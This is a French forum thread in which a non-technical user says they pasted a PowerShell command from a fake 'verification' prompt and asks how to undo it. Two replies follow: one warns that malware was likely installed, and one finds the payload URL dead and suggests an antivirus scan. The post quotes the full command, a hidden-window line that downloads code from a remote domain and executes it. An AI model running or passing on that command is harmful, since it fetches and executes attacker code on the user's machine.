Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
5038 connectés 

FORUM HardWare.fr
  Programmation
  Divers

Powershell

Mot :   Pseudo :  

Bas de page
Auteur Sujet :

Powershell

n°2539175
ptifabien
Vive la vie !
Posté le 21-07-2026 à 14:24:31  profilanswer

Bonjour à tous,
Tout d'abord je suis complètement inculte en programmation ou autre.
Je viens d'effectuer une opération que je n'aurais pas dû faire... Bref, voici ce que j'ai validé :

- windows + X
- I ou Terminal
- Ctrl + V
- Entrée

Et ce que j'ai coller était :
powershell -w h "iex(irm 'auth-code-verif.beer/4bca5ddc55d55d43' -UseBasicParsing)"; exit <#Verification ID: 4bca5ddc55d55d43#>

Je ne sais pas ce que cela peut faire sur mon PC mais pourriez vous m'aider à contrecarrer ça svp ?

Merci d'avance,
Cordialement, Ptifabien.

mood
Publicité
Posté le 21-07-2026 à 14:24:31  profilanswer

n°2539182
rat de com​bat
attention rongeur méchant!
Posté le 21-07-2026 à 16:51:18  profilanswer

Ca a téléchargé et installé je sais pas quoi, probablement un virus/spyware/ransomware/.... Bon courage...

Message édité par rat de combat le 21-07-2026 à 16:51:33

---------------
-/-
n°2539183
rat de com​bat
attention rongeur méchant!
Posté le 21-07-2026 à 16:57:09  profilanswer

Peut-être(!) tu as de la chance. Si (sous Linux) je tente de télécharger ton lien avec le logiciel wget (c'est beaucoup trop risqué de faire ça avec genre Firefox!) je me prend une erreur 404 page non trouvée. Et le site principal (donc sans le /4b...) dit "Sorry, the website has been stopped". Donc peut-être(!) tu as échappé au pire.

Je te conseille d'attendre les conseils d'un pro Windows (quelle version d'ailleurs?) pour faire un scan antivirus quand même.

Message édité par rat de combat le 21-07-2026 à 16:57:53

---------------
-/-

Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Programmation
  Divers

Powershell

Sujets relatifs
[Powershell] recupere resultat script distance[Powershell] Office 365
[PowerShell] Aide syntaxe PS et affichage de résultats byte/texte[Powershell] Supprimer un type de record DNS (windows server)
[PowerShell]Récupérer la disposition clavier active (résolu)[Powershell] Nom sur une boucle foreach ?
[Powershell] Passer un tableau de paramètres plutôt qu'une énumération[Powershell] Commande Enter-PSSession OK, Invoke-Command NOK
[Powershell] Résultat RegExp incorrect (bug?)Script powershell programmes au démarrage
Plus de sujets relatifs à : Powershell

Copyright © 1997-2025 Groupe LDLC (Signaler un contenu illicite / Données personnelles)